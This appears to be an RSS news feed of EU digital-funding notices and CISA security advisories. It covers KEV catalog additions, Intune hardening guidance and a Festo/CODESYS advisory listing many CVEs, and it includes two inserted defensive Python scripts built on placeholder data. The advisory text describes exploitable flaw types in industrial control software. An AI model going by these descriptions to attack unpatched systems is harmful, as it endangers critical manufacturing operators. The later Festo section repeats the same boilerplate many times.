RSS feed

Secondary sources (68 RSS articles)
The European Union – the media freedom hub
Governance & Regulation | EC Digital Strategy | 10 days ago

Published Thu, 03/19/2026 - 08:58. Opening: 16 April 2026. Closing: 28 May 2026. The overall goal of this preparatory action is to continue the activities of the ongoing Free Media Hub EAST project, i.e. to sustain and improve existing financial and other kinds of support to exiled independent media from Russia and Belarus, as well as media from Ukraine that have relocated to the EU, and to foster the coordination and consolidation of a pan-European platform or network of media hubs to promote the preservation of a pluralistic media environment. Main link: https://ec.europa.eu/info/funding-tenders/opportunities/portal/screen/opportuni… Related topics: Media and democracy; Media freedom and pluralism; International relations; Funding for Digital; Actions to Support Ukraine; Democracy in the digital age.

CISA Adds One Known Exploited Vulnerability to Catalog
Governance & Regulation | CISA Advisories | 11 days ago

CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation. CVE-2026-20963 Microsoft SharePoint Deserialization of Untrusted Data Vulnerability This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

CISA Adds One Known Exploited Vulnerability to Catalog
Governance & Regulation | CISA Advisories | 11 days ago

CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation. CVE-2025-66376 Synacor Zimbra Collaboration Suite (ZCS) Cross-Site Scripting Vulnerability This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.
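Both KEV entries above close with the same instruction: fold the catalog into routine vulnerability management. The script below is an added example, not CISA tooling. It reads a feed laid out like the catalog's JSON export (cveID, vendorProject, product, dueDate, ...), matches entries against a host inventory and ranks the open items by remediation deadline, overdue first. The feed excerpt, the inventory, the hostnames and the dateAdded/dueDate values are constructed placeholders; the catalog's real dates for these two CVEs are not on this page.

```python
"""Cross-reference a KEV-style catalog feed against an asset inventory.

Added example; not CISA tooling. The feed below is a constructed excerpt that
mirrors the field names of the real catalog JSON; its dates are placeholders.
"""
import json
from datetime import date

# Constructed excerpt in the shape of the KEV catalog JSON. The two CVEs are the
# ones named in the advisories above; dateAdded/dueDate are placeholder values.
KEV_FEED = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities",
    "vulnerabilities": [
        {"cveID": "CVE-2026-20963", "vendorProject": "Microsoft",
         "product": "SharePoint",
         "vulnerabilityName": "Microsoft SharePoint Deserialization of Untrusted Data Vulnerability",
         "dateAdded": "2026-03-18", "dueDate": "2026-04-08",
         "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2025-66376", "vendorProject": "Synacor",
         "product": "Zimbra Collaboration Suite (ZCS)",
         "vulnerabilityName": "Synacor Zimbra Collaboration Suite (ZCS) Cross-Site Scripting Vulnerability",
         "dateAdded": "2026-03-18", "dueDate": "2026-04-08",
         "knownRansomwareCampaignUse": "Unknown"},
    ],
})

# Constructed inventory (hostnames and products are placeholders) plus the
# (host, CVE) pairs already confirmed remediated.
INVENTORY = [
    {"host": "sp-prod-01", "vendor": "Microsoft", "product": "SharePoint"},
    {"host": "mail-01", "vendor": "Synacor", "product": "Zimbra Collaboration Suite (ZCS)"},
    {"host": "web-01", "vendor": "Apache", "product": "HTTP Server"},
]
PATCHED = {("mail-01", "CVE-2025-66376")}


def _norm(text):
    """Lower-case and collapse whitespace so free-text product names compare."""
    return " ".join(text.lower().split())


def triage(feed_json, inventory, patched, today_iso):
    """Return open KEV findings per host, sorted so overdue items come first.

    today_iso is an ISO date string (YYYY-MM-DD) used to compute days_left.
    """
    today = date.fromisoformat(today_iso)
    feed = json.loads(feed_json)
    findings = []
    for vuln in feed["vulnerabilities"]:
        due = date.fromisoformat(vuln["dueDate"])
        for asset in inventory:
            if _norm(asset["vendor"]) != _norm(vuln["vendorProject"]):
                continue
            # Catalog product strings are free text; a substring match in either
            # direction catches "SharePoint" against "SharePoint Server".
            a, p = _norm(asset["product"]), _norm(vuln["product"])
            if a not in p and p not in a:
                continue
            if (asset["host"], vuln["cveID"]) in patched:
                continue
            findings.append({
                "host": asset["host"],
                "cve": vuln["cveID"],
                "name": vuln["vulnerabilityName"],
                "due": vuln["dueDate"],
                "days_left": (due - today).days,   # negative means overdue
                "ransomware": vuln.get("knownRansomwareCampaignUse", "Unknown"),
            })
    findings.sort(key=lambda f: f["days_left"])
    return findings


if __name__ == "__main__":
    for f in triage(KEV_FEED, INVENTORY, PATCHED, "2026-03-29"):
        state = "OVERDUE" if f["days_left"] < 0 else f"{f['days_left']}d left"
        print(f"{f['host']:12} {f['cve']:16} due {f['due']} ({state})")
```

Against the live catalog, replace KEV_FEED with the downloaded JSON and the inventory with a CMDB export; the vendor/product match is deliberately loose, so review the output rather than acting on it blindly.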

CISA Urges Endpoint Management System Hardening After Cyberattack Against US Organization
Vulnerabilities & Patches | CISA Advisories | 11 days ago

CISA is aware of malicious cyber activity targeting endpoint management systems of U.S. organizations, based on the March 11, 2026 cyberattack against U.S.-based medical technology firm Stryker Corporation, which affected their Microsoft environment.[1] To defend against similar malicious cyber activity, CISA urges organizations to harden endpoint management system configurations using the recommendations and resources provided in this alert. CISA is conducting enhanced coordination with federal partners, including the Federal Bureau of Investigation (FBI), to identify additional threats and determine mitigation actions.

To defend against similar malicious activity that misuses legitimate endpoint management software, CISA urges organizations to implement Microsoft's newly released best practices for securing Microsoft Intune. The principles behind these recommendations apply to Intune and, more broadly, to other endpoint management software:

- Use principles of least privilege when designing administrative roles. Leverage Microsoft Intune's role-based access control (RBAC) to assign the minimum permissions necessary to each role for completing day-to-day operations. Permissions cover both the actions the role can take and the users and devices it can apply those actions to.
- Enforce phishing-resistant multi-factor authentication (MFA) and privileged access hygiene. Use Microsoft Entra ID capabilities (including Conditional Access, MFA, risk signals, and privileged access controls) to block unauthorized access to privileged actions in Microsoft Intune.
- Configure access policies to require Multi Admin Approval in Microsoft Intune. Set up policies that require a second administrative account's approval before changes to sensitive or high-impact actions (such as device wiping), applications, scripts, RBAC, configurations, etc. take effect.

Additionally, CISA recommends reviewing the following resources to strengthen defenses against similar malicious cyber activity:

Microsoft resources:
- For recommendations on securing Microsoft Intune, see Best practices for securing Microsoft Intune.
- For guidance on implementing Multi Admin Approval in Microsoft Intune, see Use Access policies to implement Multi Admin Approval.
- For recommendations on configuring Microsoft Intune using zero trust principles, see Configure Microsoft Intune for increased security.
- For guidance on implementing Microsoft Intune RBAC policies, see Role-based access control (RBAC) with Microsoft Intune.
- For guidance on deploying Privileged Identity Management (PIM) across Microsoft Intune, Entra ID, and other Microsoft software, see Plan a Privileged Identity Management deployment.

CISA resources:
- For guidance on implementing phishing-resistant multifactor authentication (MFA), see Implementing Phishing-Resistant MFA.

Disclaimer
The information in this report is being provided "as is" for informational purposes only. CISA does not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA.

Acknowledgements
Microsoft and Stryker contributed to this alert.

Notes
[1] For updates from Stryker on the incident, see "Customer Updates: Stryker Network Disruption," Stryker, last modified March 15, 2026, https://www.stryker.com/us/en/about/news/2026/a-message-to-our-customers-03-2026.html.
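One way to turn the three recommendations above into a repeatable review. This is an added example, not Microsoft's or CISA's code. It works on a simplified, assumed data shape (a role maps to a set of actions, an assignment has members and a device scope, an approval policy names the actions that need a second administrator) rather than the Microsoft Graph schema; the action names, role names, groups and accounts are constructed for illustration. It flags high-impact actions scoped to every device, high-impact actions with no Multi Admin Approval coverage, oversized privileged membership, and catch-all roles that should be split.

```python
"""Least-privilege review of endpoint-management role assignments.

Added example, not Microsoft's or CISA's code. The data model is an assumed
simplification, not the Microsoft Graph schema; all names below are constructed.
"""

# Actions whose misuse has fleet-wide impact. Names are assumed, modelled on the
# categories the alert lists (wiping, scripts, RBAC, configurations, apps).
HIGH_IMPACT = {"device.wipe", "device.retire", "script.assign",
               "rbac.assign", "configuration.assign", "app.assign"}

# Constructed role definitions: role name -> allowed actions.
ROLES = {
    "Help Desk Operator": {"device.read", "device.sync", "device.restartNow"},
    "Endpoint Security Manager": {"device.read", "device.wipe", "device.retire",
                                  "configuration.assign"},
    "Script Deployer": {"device.read", "script.assign"},
    "Intune Administrator": HIGH_IMPACT | {"device.read"},   # catch-all style role
}

# Constructed assignments: who holds which role over which devices.
# scope "all" means every managed device; anything else is a device group name.
ASSIGNMENTS = [
    {"role": "Help Desk Operator", "members": ["helpdesk-grp"], "scope": "all"},
    {"role": "Endpoint Security Manager", "members": ["sec-ops-grp"],
     "scope": "EMEA-Workstations"},
    {"role": "Script Deployer", "members": ["devops-grp"], "scope": "all"},
    {"role": "Intune Administrator", "scope": "all",
     "members": ["alice-admin", "bob-admin", "svc-automation", "old-contractor"]},
]

# Constructed Multi Admin Approval coverage: actions that need a second admin.
APPROVAL_REQUIRED = {"device.wipe", "device.retire"}

MAX_PRIVILEGED_MEMBERS = 3


def review(roles, assignments, approval_required, max_members=MAX_PRIVILEGED_MEMBERS):
    """Return (severity, role, finding) tuples for assignments that break the rules."""
    findings = []
    for a in assignments:
        risky = sorted(roles[a["role"]] & HIGH_IMPACT)
        if not risky:
            continue   # read-only or low-impact role: nothing to flag
        if a["scope"] == "all":
            findings.append(("high", a["role"],
                             f"high-impact actions {risky} scoped to all devices; "
                             "restrict the assignment to a device group"))
        unapproved = sorted(set(risky) - approval_required)
        if unapproved:
            findings.append(("high", a["role"],
                             f"no multi-admin approval policy covers {unapproved}"))
        if len(a["members"]) > max_members:
            findings.append(("medium", a["role"],
                             f"{len(a['members'])} members hold high-impact actions; "
                             "review membership and prefer just-in-time elevation"))
        if len(risky) == len(HIGH_IMPACT):
            findings.append(("medium", a["role"],
                             "role grants every high-impact action; split it into "
                             "task-specific roles"))
    return findings


if __name__ == "__main__":
    for sev, role, msg in review(ROLES, ASSIGNMENTS, APPROVAL_REQUIRED):
        print(f"[{sev}] {role}: {msg}")
```

Feed it a real export by mapping your tenant's role definitions, assignments and approval policies onto the same three structures; the thresholds are starting points, not Microsoft's numbers.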

CEF-Digital Info Session: 2026 Calls
Governance & Regulation | EC Digital Strategy | 11 days ago

Published Wed, 03/18/2026 - 10:35. 26 March 2026, online. Learn more about the calls "Equipment for smart European cable systems" (CEF-DIG-2026-SMART-CABLES) and "Backbone connectivity for Digital Global Gateways" (CEF-DIG-2026-GATEWAYS). Main link: https://hadea.ec.europa.eu/events/cef-digital-info-session-2026-calls-2026-03-2… Related topics: Connecting Europe Facility; Funding for Digital. Related content: Press release, 17 March 2026, Commission makes available €200 million for submarine cable and digital infrastructure projects. The European Commission has opened two new Connecting Europe Facility (CEF) calls worth €200 million for projects in high-capacity networks, including submarine cables.

CODESYS in Festo Automation Suite
Governance & Regulation | CISA Advisories | 12 days ago

3. TECHNICAL DETAILS

The following versions of CODESYS in Festo Automation Suite are affected (product status: known_affected, for every CVE listed below):

- Festo Automation Suite, versions prior to 2.8.0.138, installed with CODESYS Development System 3.0 (vers:all/*)
- Festo Automation Suite, versions prior to 2.8.0.138, installed with CODESYS Development System 3.5.16.10 (vers:all/*)
- Festo Automation Suite 2.8.0.137 installed with CODESYS Development System 3.0 (vers:all/*)
- Festo Automation Suite 2.8.0.137 installed with CODESYS Development System 3.5.16.10 (vers:all/*)

Summary
CVSS v3: 9.8
Vendor: FESTO, CODESYS
Equipment: CODESYS in Festo Automation Suite
Vulnerabilities: Direct Request ('Forced Browsing'), Untrusted Search Path, Improper Restriction of Operations within the Bounds of a Memory Buffer, Uncontrolled Recursion, Improper Access Control, Use of Insufficiently Random Values, Improper Restriction of Communication Channel to Intended Endpoints, Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'), NULL Pointer Dereference, Stack-based Buffer Overflow, Buffer Copy without Checking Size of Input ('Classic Buffer Overflow'), Incorrect Permission Assignment for Critical Resource, Improper Handling of Exceptional Conditions, Exposure of Resource to Wrong Sphere, Allocation of Resources Without Limits or Throttling, Use of a Broken or Risky Cryptographic Algorithm, Out-of-bounds Write, Weak Password Recovery Mechanism for Forgotten Password, Improper Privilege Management, Use of Password Hash With Insufficient Computational Effort, Buffer Access with Incorrect Length Value, Improper Input Validation, Improper Verification of Cryptographic Signature, Inadequate Encryption Strength, Origin Validation Error, Missing Release of Memory after Effective Lifetime, Improper Resource Shutdown or Release, Deserialization of Untrusted Data, Path Equivalence: '//multiple/leading/slash', Insufficient Verification of Data Authenticity, Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'), Missing Authentication for Critical Function, Out-of-bounds Read, Failure to Sanitize Special Elements into a Different Plane (Special Element Injection), Use of Out-of-range Pointer Offset, Improper Neutralization of Script in Attributes of IMG Tags in a Web Page, Files or Directories Accessible to External Parties, Untrusted Pointer Dereference, Path Traversal: '....' (Multiple Dot), ASP.NET Misconfiguration: Missing Custom Error Page, Uncontrolled Resource Consumption, Unprotected Transport of Credentials, Initialization of a Resource with an Insecure Default, Heap-based Buffer Overflow, Unexpected Sign Extension, Buffer Over-read, Uncontrolled Search Path Element, Improper Verification of Source of a Communication Channel, Improper Restriction of Excessive Authentication Attempts, Use After Free, ASP.NET Misconfiguration: Password in Configuration File, Improper Check for Unusual or Exceptional Conditions, Observable Discrepancy, Incorrect Default Permissions

Background
Critical Infrastructure Sectors: Critical Manufacturing
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Germany

Vulnerabilities

CVE-2025-2595: An unauthenticated remote attacker can bypass the user management in CODESYS Visualization and read visualization template files or static elements by means of forced browsing.
Relevant CWE: CWE-425 Direct Request ('Forced Browsing')
CVSS v3.1 base score 5.3 (MEDIUM), vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CVE-2010-5250: Untrusted search path vulnerability in the pthread_win32_process_attach_np function in pthreadGC2.dll in Pthreads-win32 2.8.0 allows local users to gain privileges via a Trojan horse quserex.dll file in the current working directory. NOTE: some of these details are obtained from third party information.
Relevant CWE: CWE-426 Untrusted Search Path
CVSS v3.0 base score 7.8 (HIGH), vector CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2017-3735: While parsing an IPAddressFamily extension in an X.509 certificate, it is possible to do a one-byte overread. This would result in an incorrect text display of the certificate. This bug has been present since 2006 and is present in all versions of OpenSSL before 1.0.2m and 1.1.0g.
Relevant CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
CVSS v3.1 base score 5.3 (MEDIUM), vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

CVE-2018-0739: Constructed ASN.1 types with a recursive definition (such as can be found in PKCS7) could eventually exceed the stack given malicious input with excessive recursion. This could result in a Denial of Service attack. There are no such structures used within SSL/TLS that come from untrusted sources, so this is considered safe. Fixed in OpenSSL 1.1.0h (affected 1.1.0-1.1.0g). Fixed in OpenSSL 1.0.2o (affected 1.0.2b-1.0.2n).
Relevant CWE: CWE-674 Uncontrolled Recursion
CVSS v3.1 base score 6.5 (MEDIUM), vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

CVE-2018-10612: In 3S-Smart Software Solutions GmbH CODESYS Control V3 products prior to version 3.5.14.0, user access management and communication encryption are not enabled by default, which could allow an attacker access to the device and sensitive information, including user credentials.
Relevant CWE: CWE-284 Improper Access Control
CVSS v3.1 base score 9.8 (CRITICAL), vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2018-20025: Use of Insufficiently Random Values exists in CODESYS V3 products, versions prior to V3.5.14.0.
Relevant CWE: CWE-330 Use of Insufficiently Random Values
CVSS v3.1 base score 7.5 (HIGH), vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE-2018-20026: Improper Communication Address Filtering exists in CODESYS V3 products, versions prior to V3.5.14.0.
Relevant CWE: CWE-923 Improper Restriction of Communication Channel to Intended Endpoints
CVSS v3.1 base score 7.5 (HIGH), vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE-2019-13532: CODESYS V3 web server, all versions prior to 3.5.14.10, allows an attacker to send specially crafted HTTP or HTTPS requests which may allow access to files outside the restricted working directory of the controller.
Relevant CWE: CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
CVSS v3.1 base score 7.5 (HIGH), vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE-2019-13538: 3S-Smart Software Solutions GmbH CODESYS V3 Library Manager, all versions prior to 3.5.16.0, allows the system to display active library content without checking its validity, which may allow the contents of manipulated libraries to be displayed or executed. The issue also exists for source libraries, but 3S-Smart Software Solutions GmbH strongly recommends distributing compiled libraries only.

Remediations

FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk. Starting from Festo Automation Suite version 2.8.0.138, CODESYS is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate these vulnerabilities, customers are advised to:

- Download the latest, patched version of CODESYS directly from the official CODESYS website.
- Follow the installation and update instructions provided by CODESYS to ensure all security fixes are applied.
- Regularly monitor CODESYS security advisories and apply updates promptly.
- Keep the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.

Fixed versions: CODESYS Development System 3.5.21.20, as an external component of Festo Automation Suite 2.8.0.138, is the fixed version for all CVEs.

For more information see the associated Festo SE & Co. KG security advisory FSA-202601, "Several CODESYS vulnerabilities in Festo Automation Suite":
- CSAF: https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json
- HTML: https://certvde.com/en/advisories/VDE-2025-108
https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.6 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H CVE-2019-13542 3S-Smart Software Solutions GmbH CODESYS V3 OPC UA Server, all versions 3.5.11.0 to 3.5.15.0, allows an attacker to send crafted requests from a trusted OPC UA client that cause a NULL pointer dereference, which may trigger a denial-of-service condition. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. 
To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-476 NULL Pointer Dereference Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2019-13548 CODESYS V3 web server, all versions prior to 3.5.14.10, allows an attacker to send specially crafted http or https requests which could cause a stack overflow and create a denial-of-service condition or allow remote code execution. 
View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. 
https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-121 Stack-based Buffer Overflow Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2019-18858 CODESYS 3 web server before 3.5.15.20, as distributed with CODESYS Control runtime systems, has a Buffer Overflow. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. 
Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2019-19789 3S-Smart CODESYS SP Realtime NT before V2.3.7.28, CODESYS Runtime Toolkit 32 bit full before V2.4.7.54, and CODESYS PLCWinNT before V2.4.7.54 allow a NULL pointer dereference. 
View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. 
https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-476 NULL Pointer Dereference Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2019-5105 An exploitable memory corruption vulnerability exists in the Name Service Client functionality of 3S-Smart Software Solutions CODESYS GatewayService. A specially crafted packet can cause a large memcpy, resulting in an access violation and termination of the process. An attacker can send a packet to a device running the GatewayService.exe to trigger this vulnerability. All variants of the CODESYS V3 products in all versions prior V3.5.16.10 containing the CmpRouter or CmpRouterEmbedded component are affected, regardless of the CPU type or operating system: CODESYS Control for BeagleBone, CODESYS Control for emPC-A/iMX6, CODESYS Control for IOT2000, CODESYS Control for Linux, CODESYS Control for PLCnext, CODESYS Control for PFC100, CODESYS Control for PFC200, CODESYS Control for Raspberry Pi, CODESYS Control RTE V3, CODESYS Control RTE V3 (for Beckhoff CX), CODESYS Control Win V3 (also part of the CODESYS Development System setup), CODESYS Control V3 Runtime System Toolkit, CODESYS V3 Embedded Target Visu Toolkit, CODESYS V3 Remote Target Visu Toolkit, CODESYS V3 Safety SIL2, CODESYS Edge Gateway V3, CODESYS Gateway V3, CODESYS HMI V3, CODESYS OPC Server V3, CODESYS PLCHandler SDK, CODESYS V3 Simulation Runtime (part of the CODESYS Development System). 
